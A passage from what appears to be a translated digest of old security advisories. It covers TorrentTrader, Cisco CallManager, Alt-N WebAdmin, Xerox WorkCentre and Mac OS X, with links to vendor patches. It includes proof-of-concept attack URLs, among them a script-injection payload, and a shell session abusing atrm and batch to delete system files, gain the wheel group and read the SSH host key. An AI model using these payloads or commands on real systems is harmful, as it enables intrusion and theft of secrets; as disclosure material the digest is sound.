~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Examples:
localhost/torrenttrader109/faq.php?faq_categ[999][title]=&faq_categ[999][flag]=1
localhost/torrenttrader109/torrents-details.php?id=1&keepget=“>
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
to all active waraxe.us forum members and to anyone else who know me!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Waraxe forum: www.waraxe.us/forums.html
Personal homepage: www.janekvind.com/
---------------------------------- [ EOF ] ------------------------------------
Part 5: Cisco CallManager CLI Multiple Remote Security Vulnerabilities
Affected systems:
Cisco Unified CallManager 5.0(3a)
Cisco Unified CallManager 5.0(3)
Cisco Unified CallManager 5.0(2)
Cisco Unified CallManager 5.0(1)
Unaffected systems:
Cisco Unified CallManager 5.0(4)
Description:
BUGTRAQ ID: 18952
Cisco Unified CallManager is the software-based call-processing component of the Cisco IP telephony solution.
The CallManager CLI provides an alternate administrative interface to the system, for diagnosing and troubleshooting the primary HTTPS-based management interface. This CLI runs with root privileges and contains two vulnerabilities in its command parsing:
the first may allow an authenticated CUCM administrator to execute arbitrary operating-system programs as root; the second allows command output to be redirected to a file or folder specified on the command line.
Cisco Unified CallManager supports SCCP and SIP phones side by side, allowing migration to SIP while protecting the investment in existing devices. CUCM contains a buffer overflow in its handling of overly long hostnames in SIP requests, which may lead to arbitrary code execution or denial of service.
Recommendations:
Vendor patch:
Cisco
Cisco has released a security advisory (cisco-sa-20060712-cucm) and corresponding patches:
cisco-sa-20060712-cucm: Multiple Cisco Unified CallManager Vulnerabilities
Link: www.cisco.com/warp/public/707/cisco-sa-20060712-cucm.shtml
Patch download:
www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-50
Part 6: Alt-N WebAdmin Multiple Security Vulnerabilities
Source: NSFOCUS
Release date: -01-28
Updated: 2005-01-31
Affected systems:
Alt-N WebAdmin 3.0.2
Unaffected systems:
Alt-N WebAdmin 3.0.4
Description:
--------------------------------------------------------------------------------
WebAdmin is a web application developed by Alt-N Technologies for administering MDaemon, RelayFax and WorldClient.
Alt-N WebAdmin contains multiple security issues; a remote attacker could exploit them for cross-site scripting, editing user accounts, and other attacks.
1. Cross-site scripting:
useredit_account.wdm does not properly filter user-submitted URL data; submitting malicious script code as parameter data can obtain sensitive information from the target user:
server/WebAdmin/useredit_account.wdm?user=%3Cscript%3Ealert('test')%3C/script%3E
2. Users can edit all user accounts:
The useredit_account.wdm script performs no authorisation check for access to other accounts; submitting the following URL request edits another user's account information:
server/WebAdmin/useredit_account.wdm?user=otheruser@domain
3. HTML injection:
The file modalfram.wdm allows arbitrary web pages to be loaded, which can lead users to trust the page content blindly.
<*Source: David_Alonso (kamborio@gmail.com)
Link: marc.theaimsgroup.com/?l=bugtraq&m=110692897003614&w=2
*>
Recommendations:
--------------------------------------------------------------------------------
Vendor patch:
Alt-N
-----
The vendor has released a patch for this issue; download it from the vendor's home page:
www.altn.com/products/default.asp?product%5Fid=WebAdmin
Part 7: Xerox WorkCentre and WorkCentre Pro Multiple Security Vulnerabilities
Affected systems:
Xerox WorkCentre Pro 275
Xerox WorkCentre Pro 265
Xerox WorkCentre Pro 255
Xerox WorkCentre Pro 245
Xerox WorkCentre Pro 238
Xerox WorkCentre Pro 232
Xerox WorkCentre 275
Xerox WorkCentre 265
Xerox WorkCentre 255
Xerox WorkCentre 245
Xerox WorkCentre 238
Xerox WorkCentre 232
Description:
BUGTRAQ ID: 21365
Xerox WorkCentre is a digital multifunction printer/copier.
Multiple security vulnerabilities exist in the ESS/Network Controller and MicroServer Web Server code of the Xerox WorkCentre, specifically:
* a command injection vulnerability in the TCP/IP username on the web user interface;
* a command injection vulnerability in the Scan-to-mailbox folder name field on the web user interface;
* a command injection vulnerability in the Microsoft Networking configuration parameters on the web user interface;
* browser permissions may allow unauthorised access;
* the TFTP/BOOTP auto-configuration option may allow unauthorised configuration settings;
* web service requests can be issued over HTTP rather than HTTPS;
* email message signatures can be hijacked to display incorrect items;
* the Scan-to-mailbox feature may allow anonymous, unauthenticated download of secured files;
* the device does not keep accurate time, so timestamps in the audit log are incorrect.
An attacker who successfully exploits these vulnerabilities can gain unauthorised access or change the system configuration.
<*Source: XEROX
Link: a1851.g.akamaitech.net/f/1851/2996/24h/cacheB.xerox.com/downloads/usa/en/c/cert_XRX06_006_v1.
*>
Recommendations:
Vendor patch: Xerox
-----
The vendor has released a patch for this issue; download it from the vendor's home page:
www.xerox.com
Part 8: Apple OS X Multiple Application Security Vulnerabilities
Source: NSFOCUS
Release date: 2005-01-26
Updated: 2005-01-31
Affected systems:
Apple MacOS X Server 10.3.7
Apple MacOS X 10.3.7
Description:
--------------------------------------------------------------------------------
CVE(CAN) ID: CAN-2005-0125
Mac OS X is a BSD-based operating system.
Several at-related commands shipped with Mac OS X do not drop privileges correctly; a local attacker can exploit this to delete files, run arbitrary commands, and read sensitive information.
'atrm' can be used to delete any file on the system:
CrunkJuice:~ kevinfinisterre$ id
uid=501(kevinfinisterre) gid=501(kevinfinisterre) groups=501(kevinfinisterre),
79(appserverusr), 80(admin), 81(appserveradm)
CrunkJuice:~ kevinfinisterre$ rm /etc/hosts
override rw-r--r-- root/wheel for /etc/hosts? y
rm: /etc/hosts: Permission denied
CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts
-rw-r--r-- 1 root wheel 214 3 Dec 20:19 /etc/hosts
CrunkJuice:~ kevinfinisterre$ atrm /etc/hosts
CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts
ls: /etc/hosts: No such file or directory
'batch' can be used to execute arbitrary commands with gid=0(wheel) groups=0(wheel), 1(daemon),
2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) privileges:
CrunkJuice:/tmp kevinfinisterre$ echo "/usr/bin/id >/tmp/test" >aa
CrunkJuice:/tmp kevinfinisterre$ batch -f /tmp/aa 0
Job b0118490c.000 will be executed using /bin/sh
CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test
cat: /tmp/test: No such file or directory
(wait 5 minutes)
CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test
uid=501(kevinfinisterre) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys),
4(tty), 5(operator), 20(staff), 31(guest), 80(admin)
'batch' can also be used to read any file on the system:
CrunkJuice:~ kevinfinisterre$ cat /etc/ssh_host_dsa_key
cat: /etc/ssh_host_dsa_key: Permission denied
CrunkJuice:~ kevinfinisterre$ ls -al /etc/ssh_host_dsa_key
-rw------- 1 root wheel 668 16 Nov 19:39 /etc/ssh_host_dsa_key
CrunkJuice:~ kevinfinisterre$ batch -f /etc/ssh_host_dsa_key
Job b011848db.000 will be executed using /bin/sh
CrunkJuice:~ kevinfinisterre$ ls -al /var/at/jobs/b011848db.000
-rwx------ 1 kevinfin wheel 1263 3 Dec 20:31 /var/at/jobs/b011848db.000
CrunkJuice:~ kevinfinisterre$ cat /var/at/jobs/b011848db.000
#! /bin/sh
# mail root 0
umask 22
TERM_PROGRAM=Apple_Terminal; export TERM_PROGRAM
SHELL=/bin/bash; export SHELL
TERM_PROGRAM_VERSION=100; export TERM_PROGRAM_VERSION
OLDPWD=/var/at/jobs; export OLDPWD
USER=kevinfinisterre; export USER
__CF_USER_TEXT_ENCODING=0x1F5:0:0; export __CF_USER_TEXT_ENCODING
PATH=/bin:/sbin:/usr/bin:/usr/sbin; export PATH
PWD=/Users/kevinfinisterre; export PWD
SHLVL=1; export SHLVL
HOME=/Users/kevinfinisterre; export HOME
LOGNAME=kevinfinisterre; export LOGNAME
SECURITYSESSIONID=20ee50; export SECURITYSESSIONID
cd /Users/kevinfinisterre
<*Source: Kevin Finisterre (dotslash@snosoft.com)
Link: marc.theaimsgroup.com/?l=bugtraq&m=110685027017411&w=2
*>
Recommendations:
--------------------------------------------------------------------------------
Vendor patch:
Apple
-----
The vendor has released a patch for this issue; download it from the vendor's home page:
www.apple.com/support/downloads/securityupdate2005001macosx1028client.html